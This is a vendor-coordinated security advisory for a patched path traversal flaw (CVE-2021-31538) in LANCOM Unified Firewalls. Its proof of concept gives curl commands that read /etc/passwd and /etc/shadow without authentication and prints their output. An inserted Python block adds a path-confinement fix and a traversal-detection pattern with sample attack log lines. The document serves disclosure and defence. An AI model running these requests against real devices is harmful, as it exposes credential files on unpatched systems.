Advisory ID: SYSS-2021-010
Product: LANCOM R&S Unified Firewalls UF-XXX
Manufacturer: LANCOM
Affected Version(s): LCOS FX 10.5.X
Tested Version(s): LCOS FX 10.5.RU3
Vulnerability Type: Relative Path Traversal (CWE-23)
Risk Level: High
Solution Status: Patched
Manufacturer Notification: 2021-03-17
Solution Date: 2021-05-11
Public Disclosure: 2021-05-25
CVE Reference: CVE-2021-31538
Author of Advisory: Zoellner Matthias, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

LANCOM R&S® Unified Firewalls UF-500 is a firewall and VPN gateway.

The manufacturer describes the product as follows (see [1]):

"LANCOM R&S® Unified Firewalls offer small and medium-sized enterprises a
customized complete solution for state-of-the-art security and Unified
Threat Management (UTM)."

Due to a path traversal vulnerability, an unauthenticated attacker can read
sensitive files over the web interface via crafted requests.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

Because user-supplied input is not sanitized correctly, an unauthenticated
attacker can craft requests that read sensitive files. The service handling
these requests runs with high privileges, which allows reading a large
number of files, including /etc/shadow.
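The defensive counterpart to the vulnerability class described above, as an added example that is not part of the SySS advisory or of LANCOM's firmware: a request-path resolver that percent-decodes, normalises and then checks containment in the document root (rejecting the raw and encoded dot-dot forms), plus a check over constructed access-log lines for the request pattern the PoC uses. The web root and the log lines are assumptions.

```python
"""Handling relative path traversal (CWE-23) in a web file handler, and
spotting the request pattern in access logs. Added example; the web root
and the sample log lines are assumptions, not values from the advisory."""
import posixpath
import re
from urllib.parse import unquote

WEB_ROOT = "/var/www/html"  # assumption: document root of the web service

# Dot-dot segment, raw or percent-encoded, bounded by a separator or end.
TRAVERSAL_RE = re.compile(r"(?:^|/)(?:\.\.|%2e%2e|\.%2e|%2e\.)(?:/|%2f|$)", re.I)

# Common-log-format line: client address, then the request target.
LOG_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/')

# Constructed sample access log (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [25/May/2021:10:00:01 +0200] "GET /index.html HTTP/1.1" 200 512
10.0.0.9 - - [25/May/2021:10:00:02 +0200] "GET /../../../../../../../../../../../../etc/passwd HTTP/1.1" 200 1390
10.0.0.9 - - [25/May/2021:10:00:03 +0200] "GET /..%2f..%2fetc/shadow HTTP/1.1" 200 900
"""


def resolve_web_path(url_path: str, root: str = WEB_ROOT):
    """Map a request path to a file under root; return None if it escapes.

    Decoding happens before normalisation so encoded dot segments are seen,
    and containment is decided on the normalised result, not by searching
    the raw string for '..' (which misses encodings and rejects 'a..b')."""
    decoded = unquote(url_path)
    if "\x00" in decoded:  # NUL would truncate the path in C-based servers
        return None
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if posixpath.commonpath([root, candidate]) != root:
        return None
    return candidate


def flags_traversal(request_target: str) -> bool:
    """True if the request target carries a dot-dot segment, raw or encoded."""
    return bool(TRAVERSAL_RE.search(request_target))


def traversal_hits(log_text: str):
    """Return (client, target) pairs for log lines with a dot-dot segment."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and flags_traversal(m.group(2)):
            hits.append((m.group(1), m.group(2)))
    return hits
```

Note that a normalising resolver confines every request to the root, so the log check is the part that tells a defender someone is probing for this bug rather than silently serving a 404.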
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

To reproduce the vulnerability, follow these steps:

$> curl -k --path-as-is "https://10.10.10.10/../../../../../../../../../../../../etc/passwd"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
man:x:6:12:man:/var/cache/man:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
gpserver:x:100:1:gpserver:/opt/gateprotect:/bin/false
messagebus:x:101:101:messagebus:/var/run/dbus:/bin/false
ntp:x:125:1:ntp:/var/lib/ntp:/bin/false
sshd:x:102:65534:sshd:/var/run/sshd:/bin/false
postgres:x:103:103:postgres:/var/statistic/data:/bin/false
quagga:x:107:107::/etc/quagga:/bin/false
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
gpadmin:x:354:100:gateprotect default user:/home/gpadmin:/bin/bash
systemd-network:x:999:999:systemd-network:/run/systemd/netif:/bin/false
systemd-journal:x:998:998:systemd-journal:/run/log/journal:/bin/false
bind:x:997:997:bind:/var/cache/bind:/bin/false
haproxy:x:996:996:haproxy:/run/haproxy:/bin/false
radvd:x:994:994:radvd:/run/radvd:/bin/false
siproxd:x:993:1:siproxd:/var/lib/siproxd:/bin/false
ulog:x:992:1:ulogd:/var/tmp:/bin/false
hacluster:x:991:991:hacluster:/var/lib/pacemaker:/bin/false
redis:x:990:990:redis:/var/lib/redis:/bin/false
postfix:x:989:989:postfix:/var/db/postfix:/bin/false
tftpd:x:987:987:tftpd:/srv/tftpd:/bin/false
avahi:x:1000:1000::/home/avahi:

$> curl -k --path-as-is "https://10.10.10.10/../../../../../../../../../../../../etc/shadow"
root:*:18560:0:99999:7:::
daemon:*:18560:0:99999:7:::
bin:*:18560:0:99999:7:::
sys:*:18560:0:99999:7:::
sync:*:18560:0:99999:7:::
man:*:18560:0:99999:7:::
mail:*:18560:0:99999:7:::
news:*:18560:0:99999:7:::
proxy:*:18560:0:99999:7:::
www-data:*:18560:0:99999:7:::
backup:*:18560:0:99999:7:::
gpserver:x:18560:0:99999:7:::
messagebus:x:18560:0:99999:7:::
ntp:x:18560:0:99999:7:::
sshd:x:18560:0:99999:7:::
postgres:x:18560:0:99999:7:::
quagga:x:18560:0:99999:7:::
nobody:*:18560:0:99999:7:::
gpadmin:$6$iYGTuHmJ$####REDACTED####:18560:0:99999:7:::
systemd-network:x:18560:0:99999:7:::
systemd-journal:x:18560:0:99999:7:::
bind:x:18560:0:99999:7:::
haproxy:x:18560:0:99999:7:::
radvd:x:18560:0:99999:7:::
siproxd:x:18560:0:99999:7:::
ulog:x:18560:0:99999:7:::
hacluster:x:18560:0:99999:7:::
redis:x:18560:0:99999:7:::
postfix:x:18560:0:99999:7:::
tftpd:x:18560:0:99999:7:::
avahi:!:18700:0:99999:7:::

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The vendor released a new version of the LCOS FX firmware, which fixes the
behavior.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2021-03-16: Vulnerability discovered
2021-03-17: Vulnerability reported to manufacturer
2021-03-19: Confirmed by manufacturer
2021-05-11: Fixed version released by manufacturer
2021-05-25: Advisory published by SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product Website for LANCOM UF-500
    https://www.lancom-systems.com/products/security/unified-firewalls/
[2] Release Notes
    https://www.lancom-systems.de/download/documentation/Release_Notes_FX/RN_LCOS-FX-106-Rel_DE.pdf
[3] SySS Security Advisory SYSS-2021-010
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-010.txt
[4] SySS Responsible Disclosure Policy
    https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Matthias Zoellner of SySS GmbH.
E-Mail: matthias.zoellner@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Matthias_Zoellner.asc
Key Fingerprint: 36CD 6245 CBBF DA3C 14B5 5C33 B6E2 E969 CDB2 BC91

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: https://creativecommons.org/licenses/by/3.0/deed.en